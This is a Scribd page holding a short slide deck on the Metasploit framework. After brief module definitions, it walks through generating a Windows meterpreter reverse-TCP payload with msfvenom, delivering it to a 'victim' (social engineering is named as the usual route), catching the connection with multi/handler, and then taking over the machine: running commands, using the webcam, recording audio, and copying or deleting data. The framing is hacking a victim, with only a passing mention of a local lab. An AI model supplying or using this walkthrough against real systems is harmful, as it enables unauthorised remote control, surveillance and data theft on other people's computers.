Scribd
Upload
281 views8 pages

Metasploit Framework

The Metasploit framework is an open-source tool that can be used by cybercriminals and ethical hackers to probe for vulnerabilities in networks and servers. It contains modules like exploits, payloads, encoders, and auxiliaries for functions like information gathering, scanning, and fuzzing. The document provides steps to generate a Windows payload using msfvenom, send it to a victim's machine by starting a web server, and use Metasploit to connect back for full access to control and extract information from the victim.

Uploaded by

Itz Tuhin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
281 views8 pages

Metasploit Framework

The Metasploit framework is an open-source tool that can be used by cybercriminals and ethical hackers to probe for vulnerabilities in networks and servers. It contains modules like exploits, payloads, encoders, and auxiliaries for functions like information gathering, scanning, and fuzzing. The document provides steps to generate a Windows payload using msfvenom, send it to a victim's machine by starting a web server, and use Metasploit to connect back for full access to control and extract information from the victim.

Uploaded by

Itz Tuhin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 8

Metasploit framework

What is Metasploit

The Metasploit framework is a very powerful tool which can be used


by cybercriminals as well as ethical hackers to probe systematic
vulnerabilities on networks and servers. Because it’s an open-source
framework, it can be easily customized and used with most
operating systems.
Some Metasploit MODULES

Exploits: An exploit is a code that takes advantage of a software vulnerability or security flaw.
Payloads: In computer security, the payload is the part of the private user text which could also
contain malware such as worms or viruses which performs the malicious action; deleting data,
sending spam or encrypting data.
Encoders: Encoders are used to evade the anti- virus Softwares and firewall
Nops: NOPs keep the payload sizes consistent ensuring that validly executable by the processor..
Basically makes payload stable
Auxiliary: Provides additional functionality like scanning, fuzzing, Information gathering
Create a payload using Metasploit

Open your terminal and put the command

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local ip> LPORT<Port>


-f exe > payload.exe

(To know your local host in terminal just type ifconfig)


Sending the payload

Now this is the most important part. You need to send the payload to your victim
through any medium more often most of the hackers use social engineering for
sending this kind of viruses.

But we are using it in our local environment so we can use localhost to send this.
For using the local server move the payload to /var/www/html folder. Then type

Service apache start


Gaining access

After sending the payload fire up the terminal and type

Msfconsole then follow the steps


● use exploit/multi/handler
● Set payload windows/meterpreter/reverse_tcp
● Set LHOST <attacker ip>
● Set LPORT <port>
● exploit
What next

Now you have full access of the victim machine you can do whatever you want.

This is some example.

To open a particular software in victims machine you can type this

execute -f cmd.exe (open cmd on victims system)

You can type the command help and it will show you all options.

You can click snapshot, dump record, access webcam, record voice, copy data,
delete data, upload file, download file and many more things.
Thank You

You might also like